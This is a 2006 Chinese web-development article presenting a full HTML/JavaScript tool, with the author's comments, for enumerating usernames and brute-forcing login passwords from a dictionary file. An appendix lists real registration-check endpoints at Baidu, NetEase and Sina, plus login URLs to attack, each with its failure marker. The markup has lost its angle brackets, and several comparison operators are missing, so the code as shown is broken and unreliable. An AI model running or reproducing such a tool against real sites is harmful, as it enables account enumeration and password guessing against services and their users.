【 tulaoshi.com - Web开发 】
html
head
style
body { font-size: 10pt; background-color:#D4D0C8 }
td { font-size: 9pt }
/style
/head
script language="javascript"
/*
程序标题:javascript字典探测用户名工具
发布时间:2006年8月
文章作者:翟振凯 (小琦)
作者网站:http://www.xiaoqi.net
作者论坛:http://www.tdqy.com
演示地址:http://www.xiaoqi.net/zuopin/js_user_swf.htm
QQ:22336848 53353866
关于本文:
授人予鱼,不如授人予渔。本程序的核心代码处,都有详细的注解,
目地是让大家了解一个程序的开发过程和这个程序功能的实现原理,
而不仅仅是给大家提供一个这样的工具。希望看过本文后的朋友会有
所收获,能和我共同分享用javascript编写程序的乐趣。
*/
//尝试用IE浏览器的方式创建XMLHttpRequest对象
var xmlhttp = null;
try
{
xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
}
catch(e)
{
try
{
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e){
alert("您的浏览器不能创建XMLHttpRequest对象,无法使用此程序!");
}
}
//尝试用IE浏览器的方式创建XMLHttpRequest对象结束
/*
翟振凯注:MSXML2.XMLHTTP 和 Microsoft.XMLHTTP 都是微软的XMLHTTP控件,只是版本不同。
IE的安全级别如果不是太高,微软的XMLHTTP控件是可以跨域获取数据的。
因为 Mozilla Firefox 浏览器的 XMLHttpRequest() 不能跨域获取数据,我们就不用 XMLHttpRequest() 方法创建XMLHTTP对象了。
*/
//对返回的中文编码处理 作者:翟振凯
function Rec_Html(Html)
{
var Rec=new ActiveXObject("ADODB.RecordSet");
Rec.Fields.Append("xiaoqi",201,1);
Rec.Open();
Rec.AddNew();
Rec(0).AppendChunk(Html);
Rec.Update();
return Rec(0).Value;
Rec.Close();
}
//对返回的中文编码处理结束
//开始探测 参数为要探测的当前值
function geturl(id)
{
try{
xmlhttp.open("GET",url.value+id,false);//定义数据传送方式,服务网页的URL(探测地址+探测值),是否同步执行
xmlhttp.onreadystatechange = function() {//xmlhttp 触发事件
if(xmlhttp.readyState==4)//xmlhttp对象状态如果为完成
{
if(xmlhttp.status==200) //如果服务器返回的状态码为200(成功)
{
//对结果的中文编码转换判断
if(err.value.replace(/[^W]/g,'').length=0)
/*关于转换判断的注:
例如:"翟振凯".replace(/[^W]/g,'').length 返回结果 3
"翟振凯22336848".replace(/[^W]/g,'').length 返回结果 3
"xiaoqi22336848".replace(/[^W]/g,'').length 返回结果 0
"小琦22336848".replace(/[^W]/g,'').length 返回结果 2
replace(/[^W]/g,'')的功能是把字符串里的英文和数字都清除掉。
*/
{
Html=xmlhttp.responseText;//不转换
}
else
{
Html=Rec_Html(xmlhttp.responseBody);//转换
}
//对结果的中文编码转换判断结束
// 根据判断依据区分可用或不可用的值!
if(Html.indexOf(err.value,0)0)
{
x_1.innerHTML=x_1.innerHTML+"nobr "+id;//输出可用值
}
else
{
x_2.innerHTML=x_2.innerHTML+"nobr "+id;//输出不可用值
}
// 根据判断依据区分可用或不可用的值!
}
}
}
xmlhttp.send();
}
catch(e)
{
x_2.innerHTML=x_2.innerHTML+"nobr "+id+"超时!";//输出异常或超时的值。
}
}
//开始探测结束
//载入本地字典文件,并把内容定义为数组
function kaishi(){
fileFullPath=dic_url.value;
xmlhttp.open("GET",fileFullPath,false);//载入字典文件方法
xmlhttp.send();
Html=Rec_Html(xmlhttp.responseBody);//中文编码转换
dic=Html.split('rn');//以换行符将载入的字典内容转换为数组
sl.value=dic.length;//告诉用户要探测的次数(数组大小)
xunhuan()//成功载入后开始循环探测。
}
//载入本地字典文件,并把内容定义为数组结束
//循环探测
function xunhuan()
{
bar=parseInt(jd.value);//将进度值转换为整数
if(barsl.value)//判断是否探测完
{
for(i=0;iparseInt(jc.value);i++){//设定探测线程
geturl(dic[bar+i]);//从数组内取值进行探测
}
jd.value=bar+parseInt(jc.value);//累加探测进度,并向用户呈现当前进度
setTimeout("xunhuan()",parseInt(hc.value*1000));//根据缓冲时间来进行重复循环探测
}
else//如果进度不小于要探测的次数,就向用户返回探测完成的结果。
{
alert("探测完成!");
}
}
//循环探测结束
//暂停探测函数
function pause(obj)
{
if(obj.value=='暂停')
{
obj.temp=hc.value;//记忆原来的缓冲时间。
hc.value=5000;//将缓冲时间设置为5000秒,这个值自己可以修改。
obj.value='继续';//改变按钮显示状态
}
else
{
hc.value=obj.temp;//提取原来的缓冲时间。
obj.value='暂停';//改变按钮显示状态
kaishi()//继续探测
}
}
//暂停探测函数结束
function ck()//单个值探测验证检查
{
if (url.value.length5){alert('请输入要探测地址!');return};
if (id_one.value.length1){alert('请输入要探测的值!');return};
geturl(id_one.value)
}
function ck1()//批量值探测验证检查
{
if (url.value.length5){alert("请输入要探测地址!");return}
if (err.value.length1){alert("请输入不可用标记!");return}
if (dic_url.value.length5){alert("请先选择字典文件!");return}
jd.value=0;
kaishi()
}
/script
body
程序作者:翟振凯 注:如果无法使用,或结果显示超时,请将本页下载到本地计算机上使用。
fieldset
legend探测设置/legend
table border="1" width="100%" bordercolorlight="#E6E6E6" cellspacing="0" bordercolordark="#D4D0C8"
tr
td探测地址/td
td
input type="text" id="url" size="63" value="http://www.xiaoqi.net/zuopin/login.asp?username=翟振凯&password="/td
/tr
tr
td失败包涵标记 /td
tdinput type="text" id="err" size="63" value="不正确"/td
/tr
tr
td测试单个值/td
tdinput type="text" id="id_one" size="20"
input type="button" value="探测" onclick="ck();" /td
/tr
tr
td选择字典文件/td
tdinput type="file" name="dic_url" size="20" value=""
input type="button" value="开始" onclick="ck1();"
input type="button" value="暂停" temp="" onclick="pause(this)"
input type="button" value="清除可用结果" onclick="x_1.innerHTML=''"
input type="button" value="清除不可用结果" onclick="x_2.innerHTML=''"
/td
/tr
tr
td高级参数/td
td
每次探测:input type="text" id="jc" value="1" size="3" 个
缓冲时间:input type="text" id="hc" value="0.1" size="3" 秒
进度:input type="text" id="jd" value="0" size="12"
探测数量:input type="text" id="sl" size="13"
/td
/tr
/table
/fieldset
fieldset
legend可用值:/legend
div style="height:100px;width:100%;overflow:auto;"span id="x_1"/span/div/fieldset
fieldset
legend不可用值:/legend
div style="height:100px;width:100%;overflow:auto;"span id="x_2"/span/div
/fieldset
p附录:/p
table border="1" width="100%" id="table1" cellspacing="0" cellpadding="3"
tr style="font-weight: bold; background-color: #C0C0C0"
td width="111"测试字典文件地址/td
td width="633" colspan="3"span style="font-weight: 400"
font size="3"http://www.xiaoqi.net/zuopin/dic.txt/font/span/td
/tr
tr style="font-weight: bold; background-color: #C0C0C0"
td width="111"网站名/td
td width="435"入口/td
td width="83"不可用标记/td
td width="105"备注/td
/tr
tr
td width="111"百度用户注册/td
td width="435"http://passport.baidu.com/?check_username&un=/td
td width="83"false/td
td width="105" /td
/tr
tr
td width="111"百度空间注册/td
td width="435"http://hi.baidu.com/sys/checkurl/item//td
td width="83"false/td
td width="105"要先用百度用户登陆/td
/tr
tr
td width="111"网易通行证注册/td
td width="435"http://reg.163.com/register/checkssn.jsp?username=/td
td width="83"对不起/td
td width="105" /td
/tr
tr
td width="111"新浪通行证/td
td width="435"
input type="text" size="57" value="http://unipro.sina.com.cn/cgi-bin/t5checkuser0.cgi?encpm=96ad1b22f3b6f5d641980dd7515d40b0779972460aea0f857bfd45c63380c909382087da578a10a278fa840c6cec9cb2c933eace6ef114ae61938a14a2f9fa569f33421b346faae845af2b99a203408ef831de7de17ae6726224b2f89f65efeb089ed08084afb13b8b9232bd10a7ede7fd2a6b3d2181558bef80c3a45976850d&email=&password=&password2=&pwdQ=&pwdA=&sex=&byear=1986&bmonth=01&bday=01&options=&outinstr=&safe_num=&safe_num2=&identityinfo=&identityNum=&checkidentityNum=&ismail=&userid="/td
td width="83"登录名被占用/td
td width="105" /td
/tr
tr
td width="111"测试网站用户密码暴力破解/td
td width="435"
http://www.xiaoqi.net/zuopin/login.asp?username=翟振凯&password=/td
td width="83"不正确/td
td width="105" /td
/tr
tr
td width="111"测试网站用户密码暴力破解/td
td width="435"
http://www.xiaoqi.net/zuopin/login.asp?username=小琦&password=/td
td width="83"不正确/td
td width="105" /td
/tr
/table
input type="hidden" id="dic1" value="ff"input type="hidden" id="jc_id" valuep
程序作者:翟振凯 开发日期:2006年8月br
作者网站:a href="http://www.xiaoqi.net"http://www.xiaoqi.net/abr
演示地址:a href="http://www.xiaoqi.net/zuopin/js_user_swf.htm"http://www.xiaoqi.net/zuopin/js_user_swf.htm/abr
程序打包下载地址:a href="http://www.xiaoqi.net/zuopin/js_user.rar"http://www.xiaoqi.net/zuopin/js_user.rar/abr
QQ:22336848/p/p
/body
/html